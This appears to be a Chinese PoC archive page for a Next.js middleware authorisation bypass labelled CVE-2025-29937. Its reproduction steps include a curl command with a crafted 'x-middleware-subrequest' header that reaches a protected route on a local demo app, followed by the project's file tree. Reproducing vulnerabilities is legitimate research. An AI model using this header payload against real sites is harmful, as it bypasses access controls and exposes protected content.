关联漏洞
描述
This repository is for educational and research purposes.
介绍
# CVE-2025-29937
## 再現手順
```
npm i
npm run dev
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/protected
```
文件快照
[4.0K] /data/pocs/41bd1871ba9e9784b8af0e5a73d77266686a21ce
├── [ 133] next.config.ts
├── [ 635] package.json
├── [ 59K] package-lock.json
├── [ 81] postcss.config.mjs
├── [4.0K] public
│ ├── [ 391] file.svg
│ ├── [1.0K] globe.svg
│ ├── [1.3K] next.svg
│ ├── [ 128] vercel.svg
│ └── [ 385] window.svg
├── [ 183] README.md
├── [4.0K] src
│ ├── [4.0K] app
│ │ ├── [ 25K] favicon.ico
│ │ ├── [ 488] globals.css
│ │ ├── [ 467] layout.tsx
│ │ ├── [ 643] page.tsx
│ │ ├── [4.0K] protected
│ │ │ └── [ 21K] page.tsx
│ │ └── [4.0K] unauthorized
│ │ └── [ 598] page.tsx
│ └── [ 559] middleware.ts
└── [ 602] tsconfig.json
5 directories, 18 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。